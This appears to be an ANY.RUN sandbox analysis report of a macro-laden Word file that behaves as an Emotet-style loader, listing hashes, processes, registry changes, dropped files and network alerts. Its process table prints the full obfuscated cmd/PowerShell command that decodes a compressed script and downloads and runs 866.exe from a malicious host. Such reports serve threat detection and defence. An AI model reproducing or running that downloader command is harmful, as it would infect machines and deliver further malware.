analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

INV-K71-87M9832.doc

Full analysis: https://app.any.run/tasks/576d1167-ad39-402e-86ee-9df32e77a1fe
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 08, 2018, 16:32:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Isabella-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:31:00 2018, Last Saved Time/Date: Wed Nov 7 16:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

88595362C0F57953E9D52F00EAA76634

SHA1:

C8DE45CEDFB1B00C9246D9EA909BDF4739AD1A79

SHA256:

62CB96A1DC38EA7CD8C1738F267CA4CCB0DE5253ABE722A9B51A247AFF9762F8

SSDEEP:

768:sTBSVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9tcY2tAcnBnip:s9Socn1kp59gxBK85fBt+a9kPB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3568)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3568)
    • Application was dropped or rewritten from another process

      • 866.exe (PID: 2832)
      • 866.exe (PID: 3604)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3080)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 540)
    • Creates files in the user directory

      • powershell.exe (PID: 3080)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3080)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3568)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3568)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:07 16:31:00
CreateDate: 2018:11:07 16:31:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Isabella-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
5
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe 866.exe no specs 866.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3568"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\INV-K71-87M9832.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
540CMD cmd.EXE /C"SeT OpG= (NEW-objEcT sYsTem.Io.compressiON.DeflaTESTREaM([Io.MemORySTReaM] [CONvErT]::FroMbaSE64STRIng( 'TZBBa8JAEIX/Sg4La0jdHARpXQJiROqhPagghV6SzZisJrtxd2LahPz3bkShl4F535s3zJCdKSMF7VSnZxDofQKyI6RxKUEhJ93mENECsV6EoUWA0qJJZF4gKKlyJnQV2nV8NcuHp21bJ2ZgUQqmAMNV9Tb7D08msWBcVQJcEx6e0DT23BhmmnCW5QUcuycQ0ioQ2lbgMu24kqVujrJ9XUqc0CX1OVntOy/y6Ot8TjnZfX1EBNRtgVDVAf2mwcgDyuAHKD9pA4koJuT9GntSeeONfo/mtyfuF2ytW1XqJNvIEu6eF28M9PlW3fQFplsXeld46nIufBAJiqIfhj8=' ),[io.COMpResSIoN.cOmPRessiONmOde]::deComprEsS ) ^|FOreacH{NEW-objEcT iO.sTreAMREaDer($_ , [TExt.enCoDING]::ASCIi ) }).READtOENd() ^| . ( ([StRiNG]$veRBOsEprEFerenCE)[1,3]+'X'-joiN'')&& pOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3080pOWeRSHELL . ( ${ENV:`co`mspeC}[4,26,25]-joIn'' ) (( .( \"{0}{1}\" -f'ite','m' ) ( \"{2}{1}{0}\" -f'Opg',':','eNv' ) ).\"Val`UE\" )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2832"C:\Users\admin\AppData\Local\Temp\866.exe" C:\Users\admin\AppData\Local\Temp\866.exepowershell.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Exit code:
0
Version:
1, 4, 2, 50
3604"C:\Users\admin\AppData\Local\Temp\866.exe"C:\Users\admin\AppData\Local\Temp\866.exe866.exe
User:
admin
Company:
AbanSoft / Sun Microsystems, Inc.
Integrity Level:
MEDIUM
Description:
Window I Stub
Version:
1, 4, 2, 50
Total events
1 305
Read events
1 195
Write events
106
Delete events
4

Modification events

(PID) Process:(3568) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:rx&
Value:
72782600F00D0000010000000000000000000000
(PID) Process:(3568) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3568) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3568) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661393
(PID) Process:(3568) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661508
(PID) Process:(3568) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661509
(PID) Process:(3568) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
F00D0000BA4704A98077D40100000000
(PID) Process:(3568) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:=y&
Value:
3D792600F00D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3568) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:=y&
Value:
3D792600F00D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3568) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
1
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3568WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3052.tmp.cvr
MD5:
SHA256:
3080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WEYXS3UZDIS1DGJUPNMO.temp
MD5:
SHA256:
3080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1837f3.TMPbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3568WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:1178BF800A7E9A315A240C34A220AC74
SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7
3080powershell.exeC:\Users\admin\AppData\Local\Temp\866.exeexecutable
MD5:82F7A4BB3C787D75EF9E848436C41792
SHA256:1175BE83C70C2F140571429D35B3FC2F4A8C755F5A101EC63DD30094E2B5C46E
3568WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$V-K71-87M9832.docpgc
MD5:42932D5FC21DE96320EF1ACD2664F759
SHA256:7F461E77EE00B37EB7CFF73B349978DBED673AFAE371BD6B05F225729544D54E
3080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2E6C332796340AFFBFF5230455889D0D
SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3080
powershell.exe
GET
200
216.172.183.202:80
http://steelstraightening.com/sDCqr/
US
executable
148 Kb
malicious
3080
powershell.exe
GET
301
216.172.183.202:80
http://steelstraightening.com/sDCqr
US
html
398 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3080
powershell.exe
216.172.183.202:80
steelstraightening.com
CyrusOne LLC
US
malicious

DNS requests

Domain
IP
Reputation
steelstraightening.com
  • 216.172.183.202
malicious

Threats

PID
Process
Class
Message
3080
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
3080
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3080
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3080
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info